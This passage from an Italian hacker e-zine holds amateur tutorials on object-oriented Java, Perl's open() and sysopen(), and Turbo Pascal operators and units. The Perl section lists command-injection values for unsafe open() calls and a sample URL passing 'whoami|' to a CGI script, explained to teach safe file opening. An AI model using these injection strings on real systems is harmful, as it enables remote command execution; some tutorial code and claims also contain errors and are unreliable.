appartengono.  Strettamente  collegato  all'incapsulamento  e  il  concetto   di
InformationHiding  (informazione nascosta), in quanto nel  campo  dell'OOP,  chi
utilizza un oggetto non ha interesse a sapere come è stato implementato, ma solo
come  poter  interagire con esso, ecco quindi che con ciò si permette  di  tener
'nascosti' i modi utilizzati per implementarlo. Però di un oggetto dalle  stesse
caratteristiche  all'interno di un sistema ce ne può essere  più  di  uno,  ecco
quindi che nasce l'esigenza di creare un contenitore di oggetti aventi tutti gli
stessi  attributi e metodi: le CLASSI. Le classi sono dei modelli per descrivere
degli  oggetti  aventi  tutti  le stesse caratteristiche  e  comportamenti.  Gli
oggetti  creati a partire dalla stessa classe sono detti ISTANZE  della  classe.
Questo è il DIAGRAMMA DELLE CLASSI(simile a quello degli oggetti):

+++++++++++++++++
+ <Nome Classe> +
+++++++++++++++++
+ <Attributo 1> +
+ <Attributo n> +
+++++++++++++++++
+   <Metodo 1>  +
+   <Metodo n>  +
+++++++++++++++++

Legati al concetto di classi, sono i concetti di EREDITARIETA' e POLIMORFISMO.
Per  ereditarietà  s'intende  la capacità di sviluppare  classi  da  quelle  già
esistenti. Con l'uso dell'ereditarietà si sviluppa la GERARCHIA DELLE CLASSI, in
particolare  l'ereditarietà può essere: singola o multipla. Si ha l'ereditarietà
singola  quando  da  una sopraclasse né deriva una e soltanto  una  sottoclasse,
mentre  l'ereditarietà  si  definisce multipla  quando  da  una  sopraclasse  ne
derivano  più  sottoclassi.Per quel che riguarda il  polimorfismo  s'intende  la
capacità dei metodi di assumere forme diverse da quelle definite nella gerarchia
delle  classi.  I linguaggi di programmazione, attualmente esistenti,  non  sono
tutti  associabili al paradigma OOP. Tra quelli che invece appartengono a questa
categoria, dobbiamo effettuare una distinzione tra PURI e IBRIDI. Vengono  detti
linguaggi  puri, quelli nei quali ogni cosa è oggetto, e anche i tipi che  negli
altri  linguaggi  vengono detti 'definiti'(integer, real, char),  hanno  i  loro
attributi  e  metodi.  Fanno parte di questo gruppo: lo  Smalltalk  e  l'Eiffel.
Mentre gli altri vengono detti ibridi, perché hanno anche dei dati definiti; tra
questi  troviamo:  il Java e il C++.  Termino qui questa breve  ed  introduttiva
carrellata  sulle caratteristiche del paradigma dell'object-oriented,  spero  di
essere  stato  chiaro  e invito tutti, comunque ad approfondire  quest'argomento
dalla notevole vastità.;-)

0101010101010101010101010110010101     L'OOP            IN            JAVA


Bene,  dopo  aver visto le caratteristiche dell'OOP, passiamo a  considerare  il
modo in cui viene implementato in java quanto detto precedentemente.

- Classi, Attributi e Metodi.
Nello  scorso articolo avevamo visto che un'applicazione java è formata  da  più
classi  e  il  main program è contenuto in una particolare classe  contenete  il
metodo MAIN, che veniva riconosciuto dall'interprete. Le classi in java hanno la
seguente  definizione: (N.B. ricordate sempre che il java è un linguaggio  Case-
Sensitive)

class <nome classe>
 {
   //attributi

   //metodi
 }

Ogni classe poi può avere tre diversi livelli di visibilità:
+ Public;
+ Abstract;
+ Final;
se una classe viene dichiarata public può essere sempre usata, anche fuori dalla
libreria nella quale è dichiarata.
 public class <nome classe>
  {
  }
Se  invece  una  classe viene definita abstract, vuole dire che contiene  alcuni
metodi  che  a loro volta sono astratti, per questo non può essere istanziata  e
necessita di una sotto classe dove implementare i metodi astratti.
  abstract class <Nome classe>
   {
   }
Se  infine  una  classe  è  dichiarata final, non  si  possono  creare  da  esse
sottoclassi.
 final class <Nome classe>
  {
  }
Le  classi delle quali non viene specificate il livello di visibilità vengono di
default considerate public.

GLI ATTRIBUTI.
Come  abbiamo  precedentemente  detto  gli  attributi  altro  non  sono  che  le
caratteristiche di un oggetto, la loro dichiarazione avviene come per le normali
variabili, con una sola aggiunta il livello di visibilità.

<Tipo varabile> <Nome varabile> = [val. iniziale];
Alcuni esempi:
int numero;
double Numero;
float Numero1;




se  invece  teniamo  presente  il  livello di visibilità  allora  lo  schema  di
dichiarazione sarà:
<Livello di visibilità> <Tipo varabile> <Nome varabile> = [val. iniziale];
Il  livello di visibilità indica se l'attributo è accessibile alle altre classi.
I livelli di visibilità sono 3:
- public
- private
- protected.

Se  un  attributo viene dichiarato public allora sarà accessibile  da  tutte  le
classi,  se  invece  l'attributo è stato dichiarato  private  (in  rispetto  del
concetto di Information Hiding), non è accessibile alle classi diverse da quelle
nella  quale è dichiarato. Infine se l'attributo è definito protected,  è  visto
solo  dalle  classi  che appartengono alla stessa libreria o  dalle  sottoclassi
derivanti dalla classe dove è stato dichiarato. Alcuni esempi:
public int numero;
private double x;
protected float a ;
inoltre di un attributo si possono specificare due ulteriori caratteristiche:
- static;
- final;

STATIC: con questa opzione si fa si che dell'attributo sia creata una sola copia
per tutti gli oggetti istanziati da quella classe.
FINAL: l'attributo viene considerato come una costante
Ricorrendo  all'esempio  del  libro,  implementiamo  una  classe  con  solo  gli
attributi:

class Libro
 {
   private int NumPagine;
   public String Colore = new String  /*notate questa dichiarazione usata per le
stringhe ne parleremo dopo*/
 }

I METODI

Dopo  le  caratteristiche di un oggetto passiamo a vedere la  dichiarazione  dei
comportamenti  e  delle  azioni  che  l'oggetto  può  svolgere.  Per   la   loro
dichiarazione bisogna specificare 5 elementi importanti: nome, tipo  del  valore
di  ritorno, livello di visibilità, parametri passatigli(opzionale) e istruzioni
da compiere.
<livello di visibilità> <tipo restituito> <nome del metodo>(<parametri>)
 {
  variabili;
  istruzioni;
 }

Per  quello che riguarda 'il livello di visibilità', vale quanto detto  per  gli
attributi, e cioè: public, private, protected. Un po' più d'attenzione merita il
tipo  restituito, ed adesso ne scopriamo il perché, facendo un paragone  con  le
procedure  e le function del Pascal. Le procedure sono delle parti di  programma
che  svolgono  un  determinato  compito e non  ritornano  alcun  valore,  quindi
ritornando  al  Java,  per i metodi dove non si ha alcun valore  di  ritorno  si
inserisce la parola chiave void. Un esempio vi chiarirà le idee
public void messaggio
 {
  System.out.println('Hello World');
 }


questo  metodo  dichiarato public, non presenta alcun  valore  di  ritorno,  per
questo  lo  consideriamo void. Passiamo ora alle function, come tutti  sanno  la
differenza sostanziale con le procedure è che queste hanno un valore di ritorno,
quindi in Java hanno questa struttura;
public int Addizione(int a,b)
 {
  int Somma ; //dichiarazione di una variabile

  Somma= a+b;
  return Somma
 }
Con la parola chiave return noi facciamo ritornare il valore.
N.B.  ricorda che i tipi devono coincidere. Quindi riassumendo brevemente se  un
metodo  è  stato  dichiarato  void,  l'inserimento  della  parola  return,   non
comporterà  il ritorno di alcun valore; al più comporta solo l'interruzione  del
metodo  e  il  ritorno  al  programma main. Per concludere  (momentaneamente  il
discorso  su  classi, metodi e attributi vi presento di seguito  un  esempio  di
classe prendendo in considerazione il libro:)

class Libro
 {
   /*dichiarazione degli attributi...*/
   public int NumPagine;
   private String Titolo = new String();
   private int PaginaCorrente=0;


   /*...passiamo ai metodi*/
   public void ApriLibro()
    {
       System.out.println("Il libro è stato aperto");
        PaginaCorrente=PaginaCorrente+1;
    }

   public void ChiudiLibro()
    {
      System.out.println("Il libro è stato chiuso");
    }

   public int GiraPagina(int x)
    {
      PaginaCorrente=PaginaCorrente+x;

      return PaginaCorrente;
    }

   public int StrappaPagina(int x)
    {
      NumPagine=NumPagine-x;
      return NumPagine;
    }
 } //fine classe

Do  you understand? I think yes! It's so easy...but if you have any problems try
and  try more...otherwise call me and I help you!!! Dopo aver detto come  creare
un classe vediamo come istanziare gli oggetti, cioè quelle entità che posseggono
le  caratteristiche e i comportamenti descritti nella classe. La creazione di un
oggetto   di   compone   di   due   fasi:  la  Dichiarazione   e   l'Allocazione
dell'oggetto(tramite  l'operatore new). Per quel che riguarda  la  dichiarazione
avviene  come   una normale variabile, con la sola differenza che al  posto  del
tipo  abbiamo  la classe(Le classi in java rappresentano dei TDA, cioè  tipi  di
dato  astratto),quindi  facendo riferimento alla classe libro,  presa  prima  in
considerazione, avremo la seguente dichiarazione dell'oggetto LibroItaliano  nel
main: Libro LibroItaliano; //il nome dell'oggetto lo potete scegliere voi!!!

Passiamo  ora alla allocazione, che avviene tramite l'operatore new, quindi  per
allocare l'oggetto appena dichiarato, faremo:
LibroItaliano = new Libro();

Comunque  le due fasi si possono racchiudere con una semplice riga che comprende
dichiarazione e allocazione, quindi:
 Libro LibroItaliano = new Libro();
generalizzando  la  dichiarazione/allocazione degli oggetti prende  la  seguente
forma:
<classe> <oggetto> = new <classe>()

Dopo averli creati gli oggetti possono essere usati o variando i sui attributi o
eseguendo  i suoi metodi. Ai metodi e agli attributi si accede attraverso  l'uso
del .(punto), nel seguente modo:
<oggetto>.<attributo>
<oggetto>.<metodo>
va   ricordato  inoltre  che  l'accesso  è  relativo  al  grado  di   visibilità
dell'attributo o del metodo preso in considerazione, quindi si può accedere agli
attributi public o protected, mentre solo ai metodi public.

010101010101010101010101010101010101010101010             Ereditarietà


Per  ereditarietà,  come  avevamo visto, si intende "la capacità  di  sviluppare
classi  da quelle già esistenti". In java l'ereditarità è di tipo singola,  cioè
una  sopraclasse può sviluppare massimo una sottoclasse, e presenta la  seguente
sintassi:
class <sottoclasse> extends <sopraclasse>
 {
  ...
 }

per  il  resto  mantiene  la struttura di un normale classe.  I  metodi  che  la
sottoclasse  eredita sono quelli dichiarati: public e protected;  mentre  quelli
dichiarati private o static non vengono ereditati. Facciamo un esempio:
class a
{
 public int numeroA;
}
class b extends a
{
 public int numeroB;
}

Quando andremo a creare l'oggetto della classe b, faremo così:
 b OGGB = new b();
l'oggetto  sarà poi in grado di accedere sia agli attributi della sottoclasse  b
(dalle quale è stato istanziato), sia a quelli della sopre classe a,  quindi:
OGGB.numeroA = 100;
OGGB.numeroB = 50;


010101010101010101010101010101010101010101010     Le             Stringhe



Le  stringhe  in  java assumono particolare importanza perchè  a  differenza  di
alcuni  linguaggi,  non  sono  dei tipi di dato predefiniti,  ma  sono  definite
attraverso  la  classe  String   chesi trova nel package  java.lang.  Per  poter
operare con le stringhe non bisogna fare altro che creare un nuovo oggetto della
classe String, che altro non è che un array di caratteri del quel se ne fissa la
lunghezza. La dichiarazione avviene come per un normale oggetto e cioè:
String nome = new String();

La  classe  String mette inoltre a disposizione alcuni metodi  utili  per  poter
manipolare le stringhe, eccone l'elenco con una breve descrizione:
- lenght:  restituisce il numero di caratteri che conpongono la stringa. Esempio
nome.length;
-  charAT(n): restituisce il carattere che si trova nella stringa alla posizione
indicata dal                  parametro.Esempio nome.charAT(2);
-  toLowerCase  &  toUpperCase: convertono rispettivamente la stringa  tutta  in
minuscolo e in                              maiuscolo. Esempio: nome.toLowerCase
o nome.toUppercase;
-  substring(x,y): restituisce una sottostringa, che va dalla posizione x alla y
della stringa.           Esempio: nome.substring(15,10);
- equals([stringa]): verifica se la stringa che ha come parametro è uguale a cui
viene  applicato                       come metodo, se sono  uguali  restituisce
true       altrimenti       restituisce       false.                    Esempio:
nome.equals("SysOv3rrid3").

010101010101010101010101010101010101010101    Considerazioni         finali


Bene  sono circa le 22.00, e posso dire di aver terminato questo tutorial  sulla
OOP  in  Java,  sicuramente le cose da dire non si esauriscono in  queste  brevi
pagine, ma sono molte di più...perciò Let you start the search!!!Sicuramente per
molti  l'argomento non sarà molto chiaro, come non lo è stato per  me  la  prima
volte,  quindi  vi  consiglio  solo di leggere e di  rileggere;  all'inizio  non
dormirete  la  notte, ma poi state sicuri che quando le avrete capite  dormirete
meglio!!! Se ci sono punti oscuri, critiche o commetti in generale la  mia  mail
è:  Sysoverride@libero.it  Come sempre a conclusione dell'articolo  non  possono
mancare  i  miei  +  vivi ringraziamenti e complimenti  a  Cyberdude  e  a  Lord
Unrelated Lodeguns, perchè mi permettono di scrivere su questa mitica E-zine,  e
comunque a tutto il team di InformazioneLibera (We are the Best!!!). Byez e alla
pR0xIm4!!!

C0ntact:
-+ IRC irc.azzurra.org chan #Sh3ll, #infomazionelibera, #Hacker.it
-+ MAIL sysoverride@libero.it

                                                           -=:[Sys Ov3rrid3]:=-

+--------------------------------------------------------------[open the file]-+
|[ PROGRAMMAZIONE ]                                                            | 
|-- open() e sysopen() in Perl                                                 | 
|-- f4ke^ <Membro anonino>                                                     |
|                     _________________________________________________________| 
|____________________/ 
Frase del giorno: Sondaggio su un famoso sito italiano:

Stai per venire assunto, il boss ti chiede "tu sei un hacker?", cosa rispondi?

...

+--------SO'MMARIO!--------+
|
|Intro (fake).
|-------------
|Intro (vera).
|-------------
|Funzionamento di open().
|------------------------
|Funzionamento di sysopen().
|---------------------------
|Conclusione.
|___________________________

Intro (fake).
-------------

Innanzitutto  premetto  che questo tutorial e' dedicato  ai  pochi  utenti  Perl
presenti  in Italia. Anche a chi si vuole avvicinare al Perl, ovviamente,  anche
se  questo probabilmente non sara' un tutorial per 'principianti'. Consiglio  la
lettura  a  chi  ha  un'infarinatura di base in merito a  questo  linguaggio  di
programmazione; tuttavia cerchero' di essere il piu' chiaro possibile,  di  modo
che chiunque possa perdere una decina di minuti leggendo le mie parole.

Intro (vera).
-------------

L'argomento  principale di questo breve tutorial e' il "problema" o  i  problemi
che un coder imbecille puo' avere se non conosce bene le funzionalita' di open()
o  sysopen(). Mi accingo percio' a mostrarvi come si puo' utilizzare  open()  in
maniera sicura e precisa, oppure rifarsi a un'altra funzione chiamata sysopen(),
che reputo piu' completa =)

Funzionamento di open().
------------------------

Come  si puo' intuitivamente capire, la funzione open() serve ad aprire un file,
piu'  precisamente a leggere o scrivere un file mediante un programmino in Perl.
Direi che un esempio concreto e' sicuramente piu' efficace..

open(BLAH, "< $file")
    or die "Impossibile aprire $file in lettura: $!\n";

open(BLAH, "> $file")
    or die "Impossibile aprire $file in scrittura: $!\n";

Da   qui   possiamo  estrapolare  il  funzionamento  basilare  di  un'operazione
effettuata  con open(). Come vediamo, vengono impostati due valori fondamentali:
dapprima  il nome del gestore del file, detto anche filehandle, poi il  file  da
aprire,  preceduto dall'operazione che si intende effettuare su quel dato  file.
Per  operazione  intendo se si vuole leggere o scrivere un file,  e  per  questo
dobbiamo  focalizzare l'attenzione sui simboli "<" e ">" che abbiamo  utilizzato
negli esempi precedenti. Sono proprio essi, insieme ad altri, che si occupano di
granparte delle cose, vediamo percio' un elenco completo dei caratteri  speciali
che  possiamo  usare  in  questo caso, con relative caratteristiche  riguardanti
l'utilizzo:
 ____________________________________________________
|____|_______________________________________________|
|    |                                               |
| <  | Legge un file                                 |
| >  | Scrive in un file e, se non esiste, lo crea   |
| >> | Aggiunge in un file e, se non esiste, lo crea |
|____|_______________________________________________|

Vediamo  quindi alcuni piccoli script che potete runnare per verificare che  non
dico cazzate =)

1. Esempio di lettura di un file:

--- Taglia qui ---

#!/usr/bin/perl
#
# Leggi.pl
# by f4ke^
#

$file = "file.txt";
open(prova, "<$file") || die("\n$file: $!");
@lista = <prova>;
print "Il contenuto di $file e':\n @lista";
close(prova);

--- Fuori uno ---

2.  Esempio  di  scrittura  in un file. Questo script  cerca  il  file  chiamato
file.txt  :  se  il file esiste, scrivera' in quel file e se esso  contiene  dei
contenuti, li sovrascrive. Se il file invece non esiste, provvedera' a crearlo e
a scrivere al suo interno:

--- Taglia qui ---

#!/usr/bin/perl
#
# Scrivi.pl
# by f4ke^
#

$file = "file.txt";
open(prova, ">$file") || die("\n$file: $!");
print prova "Questo testo viene scritto nel file :)\n";
close(prova);

--- Fuori due ---

3.  Esempio di di aggiunta di testo in un file. Mediante l'utilizzo del  simbolo
">>" possiamo aggiungere dei dati a un file esistente. Se il file non esiste, lo
script  provvedera' a crearlo. Se il file esiste, i dati verranno aggiunti  alla
fine di esso.

--- Taglia qui ---

#!/usr/bin/perl -w
#
# Aggiungi.pl
# by f4ke^
#

$file = "file.txt";
open(prova, ">>$file") || die("\n$file: $!");
print prova "Questo testo viene aggiunto al file :)\n";
close(prova);

--- Fuori tre ---

Ok,  abbiamo capito come e' possibile scrivere programmini che utilizzano open()
in  maniera  sicura. Ora vediamo in maniera veloce come fare a scriverne  alcuni
buggati  :D  Il  primo errore che molti (e intendo molti)  coder  fanno  e'  non
utilizzare  i  caratteri di input/output che ho spiegato prima, per  intenderci,
sto  parlando di <, > e >>. Non inserendo questi caratteri si va incontro a  una
vulnerabilita'  molto  conosciuta e parecchio pericolosa,  ossia  la  cosiddetta
Esecuzione di Comandi Remoti. In teoria si potrebbe anche fare a meno di usare i
caratteri  di  I\O,  basta assicurarsi che il file da aprire  non  possa  essere
manipolato da altri utenti. Vediamo qualche esempio di stringhe exploitabili:

open(FILE, $file);                #$file = comando|
open(FILE, "$file");              #$file = comando|
open(FILE, "/home/user" . $file); #$file = /../../bin/comando|
open(FILE, $file . ".txt");       #$file = |comando\0 (si fa uso del null byte)
open(FILE, "$file.txt");          #$file = |comando\0 (come sopra)
open(FILE, '$file')               #Non funziona a causa degli apici singoli

Mettiamo  caso  che  lo  script succhia.cgi abbia  al  suo  interno  la  stringa
open(FILE, $file); vediamo come possiamo exploitare in maniera pratica il  bug..
Dai e' una cazzata:

http://www.blablabla.com/succhia.cgi?file=whoami|

Claro?  Il pipe, ossia |, permette a open(FILE, $file); di eseguire un  comando.
Lo  stesso vale per open(FILE, "$file"); e per i restanti, anche se vi consiglio
un  attimo  di  approfondire il discorso, documentandovi  in  merito  ad  alcune
vulnerabilita', tra cui la Reverse Directory Transversal e NULL Byte.

Vi  ricordo ancora (ebbasta!) che per scrivere script che utilizzano  open()  in
maniera  sicura  e'  possibile  utilizzare i due argomenti  di  default,  oppure
aggiungerne un terzo manualmente =)

open(prova, "< $file")               # corretto
open(prova, "<$file")                # corretto
open(prova, "<", '/home/user/file')  # corretto
open(prova, "<", "file")             # corretto

Bene,  con  open()  ho  finito,  ci resta da vedere  cos'e'  sto  maledettissimo
sysopen() =)

Funzionamento di sysopen().
---------------------------

Il  funzionamento di sysopen(), come potete immaginare, e' lo stesso di  open(),
pero'  sysopen()  funziona  in  maniera del tutto  migliore  a  livello  sia  di
sicurezza  degli  script che di funzionalita' degli script  stessi.  Vediamo  il
perche'.  Innanzitutto sysopen() dispone di minimo tre parametri da  utilizzare,
con un quarto che e' opzionale:

sysopen(prova, $file, $modalità, $permessi);

prova     = nome del gestore del file;
$file     = file da aprire, o percorso del file;
$modalità = come si vuole aprire il file (lettura, scrittura, ecc.);
$permessi = permessi del file (opzionale).

Per  quanto  riguarda  il  gestore del file vale lo stesso  discorso  fatto  con
open(),  idem  per $file. Focalizziamo percio' l'attenzione sulla  modalita'  di
apertura di un file, elencando tutte le possibili funzioni utilizzabili:

O_RDONLY   = Sola lettura;
O_WRONLY   = Sola scrittura;
O_RDWR     = Lettura e scrittura;
O_CREATE   = Se il file non esiste, lo crea;
O_EXCL     = Se il file esiste, fallisce;
O_APPEND   = Aggiunge al file;
O_TRUNC    = Cancella i dati prima di inserirne di nuovi;
O_NONBLOCK = Non Blocking Access.

Naturalmente queste flag possono essere utilizzate contemporaneamente, esempio:

sysopen(prova, 'file.txt', O_WRONLY|O_TRUNC|O_CREAT);

Apre un file per scriverci dentro, cancella i dati vecchi e, se necessario, crea
un nuovo file.

sysopen(prova, 'file.txt', O_WRONLY|O_EXCL|O_CREAT);

In  questo caso creiamo un nuovo file in scrittura, ma prima ci assicuriamo  che
quel file non esista gia'.

sysopen(prova, 'file.txt', O_WRONLY|O_EXCL|O_CREAT, 0700);

Ecco  qui  una prova del quarto parametro che ho introdotto prima. Lo script  in
questo caso apre file.txt in scrittura, controlla se esso esiste e se non esiste
lo  crea,  e setta i permessi a 700: cio' in sintesi significa che la scrittura,
lettura ed esecuzione di quel file e' permessa solo all'owner di quel file  e  a
nessun'altro.

Alcune  note importanti prima di chiudere: per prima cosa, spero abbiate  notato
che  le  varie flag riguardanti la modalita' di apertura di un file  si  possono
concatenare mediante l'uso di |, percio' usate flag1|flag2|flag3, intesi?

Seconda  cosa:  nei  vostri  script in caso decidiate  di  utilizzare  sysopen()
ricordatevi assolutamente di utilizzare il modulo Fcntl! Percio':

use Fcntl;
sysopen(blablabla);

Terza  cosa: sysopen dipende strettamente dalla funzione C fdopen() e  in  molti
sistemi  UNIX  pare che sysopen() fallisca quando il nome del gestore  del  file
supera i 255 caratteri e io non posso farci nulla =)

Conclusione.
------------

MI TI CO.


+--------------------------------------------------------------[open the file]-+
|[ PROGRAMMAZIONE ]                                                            | 
|-- Tutorial 4 Turbo Pascal                                                    | 
|-- Eimiar <jnsmith_86@hotmail.com>                                            |
|                     _________________________________________________________| 
|____________________/
 +----------------------------------------------------------------------------+
 |Eimiar - 7H3 N4M3 WR073 0N 7H3 5M0K3                                        |
 |...pReSeNtS...                                                              |
 |                                                                            |
 |\_|¯|_/¯|_|¯\_|¯|_/¯|_|¯\_|¯|_/¯|_|¯\_|¯|_/¯|_|¯\_/¯|_|¯\_|¯|_/¯|_|¯\_|¯|_/¯|
 |                      TURBO PASCAL LEZIONE #4                               |
 +----------------------------------------------------------------------------+
 |Ebbene Sì MIEI CARI! siamo arrivati fino alla quarta lezione di turbo pascal|
 |In questo preciso momento, sto scrivendo con il mio autoformattatore di     |
 |testo, perché sono riuscito a farlo!!! in Turbo Pascal, sempre per restare  |
 |in argomento...                                                             |
 |                                                                            |
 |Ok, passiamo al sodo:                                                       |
 |                                                                            |
 |Questa lezione sarà dedicata a:                                             |
 |  - CALCOLI E OPERATORI LOGICI                                              |
 |  - CREAZIONE DI NUOVE UNIT                                                 |
 |  - SET, RECORD                                                             |
 |  - FUNZIONI E PROCEDURE DEL TURBO PASCAL                                   |
 |                                                                            |
 |Bene, possiamo iniziare                                                     |
 |                                                                            |
 |      CALCOLI E OPERATORI LOGICI                                            |
 |beh, questa è una delle cose più elementari da studiare, ma nel primo       |
 |tutorial, le ho "spiegate" molto ma molto superficialmente, quindi, è ora   |
 |di rifarmi                                                                  |
 |                                                                            |
 |gli operatori logici, sono quattro:                                         |
 |                                                                            |
 |AND - OR - NOT - XOR                                                        |
 |                                                                            |
 |Tutte queste funzioni agiscono in modo binario, per farvi un esempio, non   |
 |posso non spiegarvi come funzionano...                                      |
 |                                                                            |
 |cominciamo con l'AND                                                        |
 |se noi facciamo il calcolo logico 192 and 2 otterremo 0                     |
 |PERCHÈ ?!?                                                                  |
 |                                                                            |
 |e qui comincia la spiegazione del calcolo binario                           |
 |                                                                            |
 |192 in binario = 11000000                                                   |
 |2   in binario = 00000010                                                   |
 |                                                                            |
 |se noi prendiamo ogni singolo bit, e troviamo una coppia di 1, allora il    |
 |risultato sarà 1                                                            |
 |                                                                            |
 |                                    CIOÈ                                    |
 |                                                                            |
 |1 AND 0 = 0                                                                 |
 |1 AND 0 = 0                                                                 |
 |0 AND 0 = 0                                                                 |
 |0 AND 0 = 0                                                                 |
 |0 AND 0 = 0                                                                 |
 |0 AND 0 = 0                                                                 |
 |0 AND 1 = 0                                                                 |
 |0 AND 0 = 0                                                                 |
 |                                                                            |
 |                                                                            |
 |quindi, arriviamo alla conclusione che 192 AND 2 = 0                        |
 |in poche parole, il risultato di un AND fra 2 bit è 1 se i due bit sono 1   |
 |mentre è 0 quando i due bit o sono diversi (1 - 0) (0 - 1) o sono due zeri  |
 |                                                                            |
 |v'as capì?                                                                  |
 |                                                                            |
 |ora passiamo all'OR                                                         |
 |                                                                            |
 |L'OR, è anche chiamato unione, perché equivale a quel calcolo insiemistico  |
 |prendiamo sempre ad esempio i due numeri 192 e 2                            |
 |                                                                            |
 |192 in binario = 11000000                                                   |
 |2   in binario = 00000010                                                   |
 |                                                                            |
 |se noi facciamo 192 OR 2 allora, otterremo 11000010 = 194                   |
 |1 OR 0 = 1                                                                  |
 |1 OR 0 = 1                                                                  |
 |0 OR 0 = 0                                                                  |
 |0 OR 0 = 0                                                                  |
 |0 OR 0 = 0                                                                  |
 |0 OR 0 = 0                                                                  |
 |0 OR 1 = 1                                                                  |
 |0 OR 0 = 0                                                                  |
 |                                                                            |
 |11000010 = 194                                                              |
 |                                                                            |
 |V'as capì?                                                                  |
 |non ancora, quindi                                                          |
 |il risultato di un OR, è 1 quando i due bit sono 1 o sono diversi, 0 quando |
 |i due bit sono 0                                                            |
 |                                                                            |
 |ora v'as capì!                                                              |
 |                                                                            |
 |ora passiamo allo XOR, o OR ESCLUSIVO                                       |
 |                                                                            |
 |lo XOR, è simile all'OR, ma SOTTOLINEO SIMILE...                            |
 |prendiamo stavolta, due esempi diversi                                      |
 |186 e 222                                                                   |
 |                                                                            |
 |186 XOR 222 = 100                                                           |
 |PERCHè ?!?                                                                  |
 |                                                                            |
 |rifacciamo il solito schemino idiota                                        |
 |                                                                            |
 |1 XOR 1 = 0                                                                 |
 |0 XOR 1 = 1                                                                 |
 |1 XOR 0 = 1                                                                 |
 |1 XOR 1 = 0                                                                 |
 |1 XOR 1 = 0                                                                 |
 |0 XOR 1 = 1                                                                 |
 |1 XOR 1 = 0                                                                 |
 |0 XOR 0 = 0                                                                 |
 |                                                                            |
 |01100100 = 100                                                              |
 |                                                                            |
 |in poche parole, il risultato di uno XOR è 1 quando i due bit sono diversi  |
 |e 0 quando i due bit sono uguali                                            |
 |                                                                            |
 |v'as capì?                                                                  |
 |                                                                            |
 |e ora passiamo al NOT (la mia preferita)                                    |
 |stavolta, l'esempio sarà uno solo, perché il NOT è un operatore UNARIO      |
 |cioè, agisce su una sola variabile                                          |
 |                                                                            |
 |prendiamo l'esempio 1                                                       |
 |                                                                            |
 |NOT 1 = 11111110 = 254                                                      |
 |O_O !!! PERCHè ?!?                                                          |
 |                                                                            |
 |semplice, prendiamo ogni singolo bit di 1 e invertiamolo                    |
 |                                                                            |
 |cioè                                                                        |
 |                                                                            |
 |se 1 è = a 00000001 allora, invertendo ogni bit otteniamo quel numero       |
 |ESORBITANTE (e dahhhhh!)                                                    |
 |                                                                            |
 |in poche parole:                                                            |
 |il risultato di un NOT è 0 quando il bit è 1 e viceversa                    |
 |                                                                            |
 |                                                                            |
 |                                                                            |
 |V'AS CAPì ?!?!?!?!?!? SE NO, MI AMMAZZO...                                  |
 |                                                                            |
 |                                                                            |
 |     CREARE NUOVE UNIT                                                      |
 |la creazione di nuove unit, non è molto utile, infatti io non è che la uso  |
 |moltissimo, ma se vogliamo fare nuove procedure e cazzate varie che non     |
 |abbiamo testa di scrivere ogni volta nel proprio progetto, allora, questa   |
 |parte è da studiare...                                                      |
 |                                                                            |
 |le unit, sono dei files di turbo pascal contenenti procedure, funzioni, tipi|
 |variabili, costanti... e sono divise in due sezioni:                        |
 |                                                                            |
 |l'interfaccia e l'implementazione                                           |
 |                                                                            |
 |c'è anche il nome della UNIT, perché se assente quello, il compilatore, non |
 |saprà se quello che sta compilando è un programma o una unit                |
 |                                                                            |
 |nell'interfaccia si inseriranno tutte le dichiarazioni di costanti, tipi,   |
 |variabili, procedure, funzioni...                                           |
 |                                                                            |
 |nell'implementazione si inseriranno invece i corpi di tutte le procedure e  |
 |delle funzioni                                                              |
 |quindi, facciamoci velocemente una semplicissima unit                       |
 |                                                                            |
 +----------------------------------------------------------------------------+
 |{progetto UNIT }                                                            |
 |UNIT NEW;                                                                   |
 |INTERFACE                                                                   |
 |CONST PIGRECO:REAL = 3.14;                                                  |
 |VAR PUZZA:BOOLEAN;                                                          |
 |PROCEDURE CAMBIA_ARIA;                                                      |
 |FUNCTION ARIAPULITA:BOOLEAN;                                                |
 |                                                                            |
 |IMPLEMENTATION                                                              |
 |PROCEDURE CAMBIA_ARIA;                                                      |
 |BEGIN                                                                       |
 | PUZZA:=FALSE;                                                              |
 |END;                                                                        |
 |                                                                            |
 |FUNCTION ARIAPULITA:BOOLEAN;                                                |
 |BEGIN                                                                       |
 | IF PUZZA=FALSE THEN ARIAPULITA:=TRUE;                                      |
 | ELSE ARIAPULITA:=FALSE;                                                    |
 |END;                                                                        |
 |                                                                            |
 |END.                                                                        |
 +----------------------------------------------------------------------------+
 |                                                                            |
 |quindi, ora, se vogliamo usare questa unit, al progetto di un exe scriveremo|
 |in mezzo agli uses:                                                         |
 |                                                                            |
 |USES NEW;    {NEW perché new è il nome della unit}                          |
 |                                                                            |
 |v'as capì?                                                                  |
 |                                                                            |
 |ora, facciamo un minuscolo e stupidissimo EXE che sfrutta 'sta UNIT         |
 |                                                                            |
 +----------------------------------------------------------------------------+
 |{progetto EXE STUPIDO}                                                      |
 |PROGRAM EXE;                                                                |
 |USES NEW,CRT;                                                               |
 |VAR                                                                         |
 |SPUSA:INTEGER;                                                              |
 |                                                                            |
 |BEGIN                                                                       |
 |CLRSCR;                                                                     |
 |WRITELN('Quante ore fa sei andato in bagno?');                              |
 |READLN(SPUSA);                                                              |
 |IF SPUSA > 2 THEN PUZZA:=FALSE;                                             |
 |ELSE PUZZA:=TRUE;                                                           |
 |WRITELN('Il risultato del sentire se c'è puzza nel bagno, è ',ARIAPULITA);  |
 |CAMBIA_ARIA;                                                                |
 |WRITELN('Devo pensare sempre a tutto io... ora il risultato è ',ARIAPULITA);|
 |                                                                            |
 |END.                                                                        |
 +----------------------------------------------------------------------------+
 |                                                                            |
 |v'as capì?                                                                  |
 |                                                                            |
 +----------------------------------------------------------------------------+
 |                                                                            |
 |     SET, RECORD                                                            |
 |adesso iniziamo i tipi strutturati, cioè i SET, i RECORD e i TIPI, poi      |
 |proveremo ad usare questi oggetti con le istruzioni WITH e IN               |
 |                                                                            |
 |  - I SET                                                                   |
 |i set sono delle variabili paragonabili a degli insiemi, in effetti sono    |
 |veramente degli insiemi...                                                  |
 |                                                                            |
 |dichiarazione:                                                              |
 |                                                                            |
 +----------------------------------------------------------------------------+
 |VAR ALFABETO:SET OF CHAR;                                                   |
 |VAR ALFABETO2:SET OF CHAR;                                                  |
 |BEGIN                                                                       |
 | ALFABETO:=['a'..'z'];                                                      |
 | ALFABETO2:=['A'..'Z'];                                                     |
 |END.                                                                        |
 +----------------------------------------------------------------------------+
 |                                                                            |
 |in pratica, un insieme contenente dati del tipo dichiarato                  |
